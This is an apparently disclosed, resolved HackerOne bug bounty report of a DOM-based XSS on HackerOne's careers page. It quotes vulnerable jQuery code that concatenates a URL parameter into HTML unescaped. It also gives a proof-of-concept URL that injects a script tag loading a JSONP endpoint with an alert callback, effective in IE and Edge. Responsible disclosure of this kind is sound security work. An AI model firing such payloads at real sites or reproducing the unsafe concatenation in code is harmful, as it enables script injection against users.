Cross-site Scripting (XSS) on HackerOne careers page
Low
Vulnerability Details
Dear HackerOne team,
**Summary:**
I found DOM XSS at endpoint `https://www.hackerone.com/careers`, but can not bypass CSP. It's work on IE and Edge.
### Steps To Reproduce
- JS file is "Masonry js file", vulnerability code:
```javascript
//Checking for potential Lever source or origin parameters
var pageUrl = window.location.href;
var leverParameter = '';
var trackingPrefix = '?lever-'
if( pageUrl.indexOf(trackingPrefix) >= 0){
// Found Lever parameter
var pageUrlSplit = pageUrl.split(trackingPrefix);
leverParameter = '?lever-'+pageUrlSplit[1];
}
```
```javascript
var link = posting.hostedUrl+leverParameter;
jQuery('#jobs-container .jobs-list').append(
'<div class="job '+teamCleanString+' '+locationCleanString.replace(',', '')+' '+commitmentCleanString+'">' +
'<a class="job-title" href="'+link+'"">'+title+'</a>' +
'<p class="tags"><span>'+team+'</span><span>'+location+'</span><span>'+commitment+'</span></p>' +
'<p class="description">'+shortDescription+'</p>' +
'<a class="btn" href="'+link+'">Learn more</a>' +
'</div>'
);
```
- `link` variable is append by jquery.
- POC: `https://www.hackerone.com/careers?lever-#aaa"><script src="https://app-sj17.marketo.com/index.php/form/getForm?callback=alert"></script>`
### Optional: Your Environment (Browser version, Device, etc)
* IE, Edge (because url is encoded on firefox and chrome)
### Optional: Supporting Material/References (Screenshots)
{F400895}
{F400896}
## Impact
* XSS but can not bypass CSP
* inject html code
Actions
View on HackerOneReport Stats
- Report ID: 474656
- State: Closed
- Substate: resolved
- Upvotes: 227